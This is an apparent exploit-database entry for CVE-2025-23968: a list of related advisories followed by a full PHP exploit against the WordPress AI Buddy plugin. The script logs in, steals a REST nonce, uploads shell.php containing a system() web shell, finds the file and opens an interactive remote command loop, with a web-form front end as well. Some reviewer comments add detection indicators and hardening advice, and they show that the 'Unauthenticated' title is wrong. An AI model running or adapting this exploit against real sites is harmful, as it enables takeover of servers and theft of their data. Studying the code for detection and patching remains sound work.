| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Exploit for CVE-2025-23968 | 3 Jul 202519:34 | – | githubexploit | |
| CVE-2025-23968 | 3 Jul 202521:40 | – | circl | |
| WordPress plugin AiBud WP 代码问题漏洞 | 3 Jul 202500:00 | – | cnnvd | |
| CVE-2025-23968 | 3 Jul 202518:49 | – | cve | |
| CVE-2025-23968 WordPress AiBud WP plugin <= 1.9 - Arbitrary File Upload vulnerability | 3 Jul 202518:49 | – | cvelist | |
| EUVD-2025-19896 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-23968 | 3 Jul 202519:15 | – | nvd | |
| 📄 AI Plugins 1.10.9 Shell Upload | 3 Dec 202500:00 | – | packetstorm | |
| 📄 WordPress AI Buddy 1.8.5 Shell Upload | 5 Dec 202500:00 | – | packetstorm | |
| 📄 WordPress AI Bud 1.8.5 Shell Upload | 4 Mar 202600:00 | – | packetstorm |
=============================================================================================================================================
| # Title : WordPress AI Buddy Plugin <= 1.8.5 - Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/210977/ & CVE-2025-23968
[+] Summary :
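This PoC targets an authenticated arbitrary file upload vulnerability in the AI Buddy plugin for WordPress, versions 1.8.5 and earlier. Although the title above says "Unauthenticated", the script below logs in with a WordPress username and password before it calls the upload endpoint.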
The vulnerability allows authenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the image attachment functionality in the AI Buddy REST API endpoint.
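The vulnerability exists in the attachment upload functionality, where the plugin insecurely handles remote file URLs and allows arbitrary file extensions to be specified, bypassing WordPress security controls. In the PoC below the request carries both a remote `url` and a caller-chosen `filename` ending in `.php`, so the missing control is server-side validation of the stored file's name and type.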
[+] POC : php poc.php https://target.com admin password123 "whoami"
<?php
/**
* AI Buddy Plugin <= 1.8.5 - Unauthenticated RCE Exploit (CVE-2025-23968)
* Author: indoushka
* Vendor: https://wpcenter.io/
* Vulnerable Versions: <= 1.8.5
*/
/**
 * Proof-of-concept driver for CVE-2025-23968 (AI Buddy plugin, arbitrary file upload).
 *
 * Flow as coded: log in through /wp-login.php, read a REST nonce from
 * /wp-admin/tools.php, POST a JSON body carrying a remote "url" and the
 * "filename" "shell.php" to /wp-json/ai-buddy/v1/wp/attachments, then probe
 * three locations under /wp-content/uploads/ for the stored file.
 *
 * Reviewer notes for defenders:
 * - The file header says "Unauthenticated", but exploit() starts with wp_login()
 *   and stops when it returns false; valid credentials are a precondition here.
 * - Log artefacts visible in this code: a POST to the attachments route whose
 *   JSON "filename" ends in .php, followed by GETs under /wp-content/uploads/
 *   with a "cmd" query parameter (first probe value: echo+AI_BUDDY_TEST).
 * - Hardening that addresses this flow: update the plugin past the affected
 *   versions named in the advisory, deny PHP execution under the uploads
 *   directory, and alert on .php files appearing there.
 *
 * All methods share one cURL handle; options set by one request stay on the
 * handle for later requests unless overwritten.
 */
class AIBuddyRCE {
// Base URL of the WordPress site, trailing slashes removed in the constructor.
private $target;
// Shared cURL handle created in the constructor and closed in __destruct().
private $session;
// REST nonce; written by extract_nonce(), required by upload_shell().
private $nonce;
/**
 * Stores the base URL and creates the shared cURL handle.
 *
 * The handle follows redirects, uses a 30 second timeout and has TLS peer and
 * host verification switched off, so every later request (including the login
 * POST) is sent without certificate checks.
 *
 * @param string $target_url Base URL of the site; trailing "/" is stripped.
 */
public function __construct($target_url) {
$this->target = rtrim($target_url, '/');
$this->session = curl_init();
// Configure cURL
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
// Certificate and hostname checks are both disabled.
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 30,
// Fixed browser-style string; easy to change, so only a weak log indicator.
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);
}
/**
 * Posts the standard login form to /wp-login.php.
 *
 * The result is decided by scanning the returned text for Set-Cookie lines and
 * checking the parsed map for a key named exactly 'wordpress_logged_in'.
 *
 * @param string $username Value sent as the "log" field.
 * @param string $password Value sent as the "pwd" field.
 * @return bool True when that cookie key was found, false otherwise.
 */
public function wp_login($username, $password) {
echo "[*] Logging into WordPress...\n";
$login_data = http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $this->target . '/wp-admin',
'testcookie' => '1'
]);
curl_setopt_array($this->session, [
CURLOPT_URL => $this->target . '/wp-login.php',
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $login_data,
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'Cookie: wordpress_test_cookie=WP Cookie check'
]
]);
$response = curl_exec($this->session);
// Read but not used anywhere in this method.
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
// Get cookies from session
$cookies = [];
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $response, $matches);
foreach($matches[1] as $item) {
// Each "name=value" pair is parsed as a query string and merged into one map.
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
if (isset($cookies['wordpress_logged_in'])) {
echo "[+] Successfully logged in\n";
return true;
} else {
echo "[-] Login failed\n";
return false;
}
}
/**
 * Fetches /wp-admin/tools.php and pulls the plugin's nonce out of the page.
 *
 * Looks for the script element with id "ai_buddy_admin_scripts-js-extra",
 * JSON-decodes the value assigned to ai_buddy_localized_data and stores
 * ['ai_buddy_image_post_attachment']['nonce'] in $this->nonce.
 *
 * NOTE(review): which roles receive this script on tools.php cannot be told
 * from this file; confirm against the plugin before scoping exposure.
 *
 * @return bool True when a nonce was stored, false otherwise.
 */
public function extract_nonce() {
echo "[*] Extracting AI Buddy nonce...\n";
curl_setopt_array($this->session, [
CURLOPT_URL => $this->target . '/wp-admin/tools.php',
CURLOPT_HTTPGET => true,
CURLOPT_HTTPHEADER => []
]);
$response = curl_exec($this->session);
// Extract nonce from JavaScript
preg_match('/<script id="ai_buddy_admin_scripts-js-extra">.*?var ai_buddy_localized_data = (.*?);\s*<\/script>/s', $response, $matches);
if (isset($matches[1])) {
$data = json_decode($matches[1], true);
if (isset($data['ai_buddy_image_post_attachment']['nonce'])) {
$this->nonce = $data['ai_buddy_image_post_attachment']['nonce'];
// The nonce value is printed to the operator's output.
echo "[+] Nonce found: " . $this->nonce . "\n";
return true;
}
}
echo "[-] Failed to extract nonce\n";
return false;
}
/**
 * Sends the attachment request that the advisory describes.
 *
 * Requires $this->nonce. The JSON body sets "url" to the value returned by
 * create_remote_shell() and "filename" to "shell.php"; the nonce travels in an
 * X-Wp-Nonce header. On HTTP 200 the method calls find_shell_url().
 *
 * Defender view: this single POST is the request to alert on. A request to
 * the attachments route whose "filename" has a script extension is the
 * indicator this code produces.
 *
 * @param string|null $shell_content File content; when empty, a one-line PHP
 *                                   script that passes the "cmd" request
 *                                   parameter to system() is used.
 * @return string|false URL found by find_shell_url(), or false when the nonce
 *                      is missing, the upload did not return 200, or no probe
 *                      matched.
 */
public function upload_shell($shell_content = null) {
if (!$this->nonce) {
echo "[-] No nonce available. Extract nonce first.\n";
return false;
}
echo "[*] Uploading web shell...\n";
if (!$shell_content) {
$shell_content = "<?php if(isset(\$_REQUEST['cmd'])){ system(\$_REQUEST['cmd']); } ?>";
}
// First, we need to create a remote file that will be fetched by AI Buddy
$remote_shell_url = $this->create_remote_shell($shell_content);
if (!$remote_shell_url) {
echo "[-] Failed to create remote shell\n";
return false;
}
$payload = [
"title" => "hack",
"caption" => "the",
"alt" => "planet",
"description" => "Hack the Planet!",
"url" => $remote_shell_url,
"filename" => "shell.php"
];
$json_payload = json_encode($payload);
curl_setopt_array($this->session, [
CURLOPT_URL => $this->target . '/wp-json/ai-buddy/v1/wp/attachments',
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $json_payload,
CURLOPT_HTTPHEADER => [
'Content-Type: application/json; charset=UTF-8',
'X-Wp-Nonce: ' . $this->nonce
]
]);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Shell uploaded successfully\n";
// Try to determine the shell URL
$shell_url = $this->find_shell_url();
if ($shell_url) {
echo "[+] Shell accessible at: " . $shell_url . "\n";
return $shell_url;
}
// A 200 with no matching probe falls through to the final return false.
} else {
echo "[-] Upload failed. HTTP Code: " . $http_code . "\n";
// The raw response body from the target is echoed as-is.
echo "Response: " . $response . "\n";
}
return false;
}
/**
 * Writes $content to a local file and returns a fixed URL.
 *
 * The file is named temp_shell_<uniqid>.php and is written with a relative
 * path, i.e. into the process's current working directory. The returned URL is
 * a hard-coded string and does not depend on $content or on the file written.
 *
 * Reviewer note: the local file is never removed by this class. Anyone running
 * the script in a lab, or hosting it under a web server, is left with a PHP
 * file containing the command-runner payload in that directory.
 *
 * @param string $content Content written to the local file.
 * @return string The hard-coded URL below.
 */
private function create_remote_shell($content) {
// In a real scenario, you'd upload this to a server you control
// For demonstration, we'll use a temporary approach
$filename = 'temp_shell_' . uniqid() . '.php';
file_put_contents($filename, $content);
echo "[+] Created local shell file: " . $filename . "\n";
// Note: In real exploitation, you need to host this on a public server
return "https://raw.githubusercontent.com/d0n601/d0n601/refs/heads/master/test.jpg";
}
/**
 * Probes three fixed upload locations for shell.php.
 *
 * Each probe is a GET with ?cmd=echo+AI_BUDDY_TEST; a location counts as found
 * when the status is 200 and the body contains AI_BUDDY_TEST. The year and
 * month in the first path come from the clock of the machine running this
 * script.
 *
 * Defender view: the marker string and the "cmd" parameter on a path under
 * /wp-content/uploads/ are both searchable in access logs.
 *
 * @return string|false First matching URL (without the query string), or false.
 */
private function find_shell_url() {
$current_year = date('Y');
$current_month = date('m');
// Common paths where the shell might be uploaded
$possible_paths = [
"/wp-content/uploads/{$current_year}/{$current_month}/shell.php",
"/wp-content/uploads/shell.php",
"/wp-content/uploads/ai-buddy/shell.php"
];
foreach ($possible_paths as $path) {
$test_url = $this->target . $path;
curl_setopt_array($this->session, [
CURLOPT_URL => $test_url . '?cmd=echo+AI_BUDDY_TEST',
CURLOPT_HTTPGET => true
]);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200 && strpos($response, 'AI_BUDDY_TEST') !== false) {
return $test_url;
}
}
return false;
}
/**
 * Requests $shell_url with the command in the "cmd" query parameter.
 *
 * The command is URL-encoded, the response body is echoed and also returned.
 *
 * @param string $shell_url URL returned by upload_shell().
 * @param string $command   Value placed in the "cmd" parameter.
 * @return string|bool Whatever curl_exec() returned for the request.
 */
public function execute_command($shell_url, $command) {
echo "[*] Executing command: " . $command . "\n";
$encoded_cmd = urlencode($command);
$url = $shell_url . '?cmd=' . $encoded_cmd;
curl_setopt_array($this->session, [
CURLOPT_URL => $url,
CURLOPT_HTTPGET => true
]);
$response = curl_exec($this->session);
echo $response . "\n";
return $response;
}
/**
 * Reads lines from STDIN and passes each non-empty one to execute_command().
 *
 * The loop ends only when the trimmed input equals 'exit'.
 *
 * @param string $shell_url URL returned by upload_shell().
 */
public function interactive_shell($shell_url) {
echo "[+] Starting interactive shell. Type 'exit' to quit.\n";
while (true) {
echo "cmd> ";
$command = trim(fgets(STDIN));
if ($command == 'exit') {
break;
}
if (!empty($command)) {
$this->execute_command($shell_url, $command);
}
}
}
/**
 * Runs the steps in order: wp_login(), extract_nonce(), upload_shell(), then
 * either one command or the interactive loop.
 *
 * Each step must succeed for the next to run, so a failed login ends the run
 * before any request reaches the plugin's REST route.
 *
 * @param string      $username WordPress user name.
 * @param string      $password WordPress password.
 * @param string|null $command  Single command to send; when empty the
 *                              interactive loop is started instead.
 * @return bool False when any of the first three steps fails, true otherwise.
 */
public function exploit($username, $password, $command = null) {
if (!$this->wp_login($username, $password)) {
return false;
}
if (!$this->extract_nonce()) {
return false;
}
$shell_url = $this->upload_shell();
if (!$shell_url) {
return false;
}
if ($command) {
$this->execute_command($shell_url, $command);
} else {
$this->interactive_shell($shell_url);
}
return true;
}
/**
 * Closes the shared cURL handle when the object is destroyed.
 */
public function __destruct() {
if ($this->session) {
curl_close($this->session);
}
}
}
// Entry point. Under the CLI SAPI the script takes its inputs from argv;
// under any other SAPI it serves an HTML form and acts on POSTed fields.
// Command line interface
if (php_sapi_name() === 'cli') {
echo "
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
AI Buddy Plugin <= 1.8.5 RCE Exploit (CVE-2025-23968)
By: indoushka
\n";
// Target, username and password are mandatory; the command is optional.
if ($argc < 4) {
echo "Usage: php ai_buddy_rce.php <target> <username> <password> [command]\n";
echo "Examples:\n";
echo " php ai_buddy_rce.php https://target.com admin password123\n";
echo " php ai_buddy_rce.php https://target.com admin password123 'whoami'\n";
exit(1);
}
// The password is taken from argv, so it is part of the process command line.
$target = $argv[1];
$username = $argv[2];
$password = $argv[3];
$command = $argc > 4 ? $argv[4] : null;
$exploit = new AIBuddyRCE($target);
$exploit->exploit($username, $password, $command);
} else {
// Web interface
// NOTE(review): this branch performs no authentication or CSRF check of its
// own; the only gate is that the three POST fields are present. Whoever can
// reach the script can make the hosting server send requests to any target.
if (isset($_POST['target']) && isset($_POST['username']) && isset($_POST['password'])) {
$target = $_POST['target'];
$username = $_POST['username'];
$password = $_POST['password'];
$command = $_POST['command'] ?? null;
$exploit = new AIBuddyRCE($target);
// Everything the class echoes, including response bodies from the target,
// is captured here.
ob_start();
$result = $exploit->exploit($username, $password, $command);
$output = ob_get_clean();
// NOTE(review): the captured text is written into the page without HTML
// escaping, so markup returned by the remote site is rendered in the
// operator's browser.
echo "<pre>$output</pre>";
} else {
echo '<h1>AI Buddy RCE Exploit</h1>
<form method="post">
Target URL: <input type="text" name="target" size="50" placeholder="https://example.com"><br>
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
Command: <input type="text" name="command" placeholder="whoami (optional)"><br>
<input type="submit" value="Exploit">
</form>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================